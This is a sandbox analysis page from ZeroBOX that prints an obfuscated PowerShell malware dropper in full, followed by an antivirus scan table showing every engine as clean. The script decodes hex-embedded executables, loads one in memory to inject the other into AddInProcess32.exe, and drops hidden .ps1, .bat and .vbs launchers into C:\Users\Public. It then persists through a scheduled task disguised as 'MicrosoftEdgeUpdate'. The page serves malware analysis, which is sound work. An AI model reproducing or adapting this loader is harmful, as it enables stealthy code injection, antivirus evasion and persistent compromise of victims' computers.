Static | ZeroBOX
No static analysis available.
$Content = @'
$hexString_bbb = "4D~,.~5A~,.~90~,.~00~,.~03~,.~00~,.~00~,.~00~,.~04~,.~00~,.~00~,.~00~,.~FF~,.~FF~,.~00~,.~00~,.~B8~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~40~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~80~,.~00~,.~00~,.~00~,.~0E~,.~1F~,.~BA~,.~0E~,.~00~,.~B4~,.~09~,.~CD~,.~21~,.~B8~,.~01~,.~4C~,.~CD~,.~21~,.~54~,.~68~,.~69~,.~73~,.~20~,.~70~,.~72~,.~6F~,.~67~,.~72~,.~61~,.~6D~,.~20~,.~63~,.~61~,.~6E~,.~6E~,.~6F~,.~74~,.~20~,.~62~,.~65~,.~20~,.~72~,.~75~,.~6E~,.~20~,.~69~,.~6E~,.~20~,.~44~,.~4F~,.~53~,.~20~,.~6D~,.~6F~,.~64~,.~65~,.~2E~,.~0D~,.~0D~,.~0A~,.~24~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~50~,.~45~,.~00~,.~00~,.~4C~,.~01~,.~03~,.~00~,.~91~,.~AA~,.~BE~,.~64~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~E0~,.~00~,.~02~,.~01~,.~0B~,.~01~,.~08~,.~00~,.~00~,.~FC~,.~00~,.~00~,.~00~,.~0A~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,
$hexString_pe = "4D~,.~5A~,.~90~,.~00~,.~03~,.~00~,.~00~,.~00~,.~04~,.~00~,.~00~,.~00~,.~FF~,.~FF~,.~00~,.~00~,.~B8~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~40~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~80~,.~00~,.~00~,.~00~,.~0E~,.~1F~,.~BA~,.~0E~,.~00~,.~B4~,.~09~,.~CD~,.~21~,.~B8~,.~01~,.~4C~,.~CD~,.~21~,.~54~,.~68~,.~69~,.~73~,.~20~,.~70~,.~72~,.~6F~,.~67~,.~72~,.~61~,.~6D~,.~20~,.~63~,.~61~,.~6E~,.~6E~,.~6F~,.~74~,.~20~,.~62~,.~65~,.~20~,.~72~,.~75~,.~6E~,.~20~,.~69~,.~6E~,.~20~,.~44~,.~4F~,.~53~,.~20~,.~6D~,.~6F~,.~64~,.~65~,.~2E~,.~0D~,.~0D~,.~0A~,.~24~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~50~,.~45~,.~00~,.~00~,.~4C~,.~01~,.~03~,.~00~,.~74~,.~77~,.~98~,.~9C~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~E0~,.~00~,.~0E~,.~21~,.~0B~,.~01~,.~30~,.~00~,.~00~,.~1E~,.~03~,.~00~,.~00~,.~06~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.
[Byte[]] $bbb = $hexString_bbb -split '~,.~' | ForEach-Object { [byte]([convert]::ToInt32($_, 16)) }
[Byte[]] $pe = $hexString_pe -split '~,.~' | ForEach-Object { [byte]([convert]::ToInt32($_, 16)) }
sleep 5
$RXXn1 = 'Get'
$RXX = $RXXn1 + 'M~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~et~,.~h~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~od'.Replace('~,.~','')
$IUX = 'I~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~nv~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~oke'.Replace('~,.~','')
$RXXn1 = $RXXn1 + 'T~,.~y~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~pe'.Replace('~,.~','')
$YS = 'Load'
$AWV = [Reflection.Assembly]
$EZW = $AWV::$YS($pe)
$EZW = $EZW.$RXXn1('N~,.~ew~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~PE~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~2.PE'.Replace('~,.~',''))
$EZW = $EZW.$RXX('E~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~xec~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~ute'.Replace('~,.~',''))
$RXXn = 'C:\Wind~,.~ows~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~\Mic'.Replace('~,.~','')
$EYA = $RXXn + 'ro~,.~soft.~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~NET\Fr'.Replace('~,.~','')
$YYW = $EYA + 'ame~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~wo~,.~rk\v4.0'.Replace('~,.~','')
$LDE = $YYW + '.30~,.~319\'.Replace('~,.~','')
$IEZ = $LDE + 'A~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~dd~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~I~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~nP~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~roce~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~ss~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~32.~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~~,.~exe'.Replace('~,.~','')
return $EZW = $EZW.$IUX($null,[object[]] ($IEZ,$bbb));
[IO.File]::WriteAllText("C:\Users\Public\BTXQJSSA.ps1", $Content)
$Content = @'
@e%BTXQJSSA%%BTXQJSSA% off
set "ps=powershell.exe"
set "params=-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass"
set "cmd=C:\Users\Public\BTXQJSSA.ps1"
%ps% %params% -Command "& '%cmd%'"
exit /b
[IO.File]::WriteAllText("C:\Users\Public\BTXQJSSA.bat", $Content)
$Content = @'
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
Dim a, b, c, d
a = "C:\Users\Public\BTXQJSSA.bat"
b = "W" + "S" + "c" + "ript"
bs = ".S" + "h" + "ell"
d = ""
Set e = CreateObject(d & b & bs)
e.Run a, c
[IO.File]::WriteAllText("C:\Users\Public\BTXQJSSA.vbs", $Content)
Sleep 2
$scheduler = New-Object -ComObject Schedule.Service
$scheduler.Connect()
$taskDefinition = $scheduler.NewTask(0)
$taskDefinition.RegistrationInfo.Description = "Runs a script every 2 minutes"
$taskDefinition.Settings.Enabled = $true
$taskDefinition.Settings.DisallowStartIfOnBatteries = $false
$trigger = $taskDefinition.Triggers.Create(1) # 1 = TimeTrigger
$trigger.StartBoundary = [DateTime]::Now.ToString("yyyy-MM-ddTHH:mm:ss")
$trigger.Repetition.Interval = "PT2M"
Action
$action = $taskDefinition.Actions.Create(0) # 0 = ExecAction
$action.Path = "C:\Users\Public\BTXQJSSA.vbs"
$taskFolder = $scheduler.GetFolder("\")
$taskFolder.RegisterTaskDefinition("MicrosoftEdgeUpdate", $taskDefinition, 6, $null, $null, 3)
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Clean
Cyren Clean
Symantec Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition Clean
FireEye Clean
Emsisoft Clean
Ikarus Clean
GData Clean
Jiangmin Clean
Avira Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Clean
Panda Clean
No IRMA results available.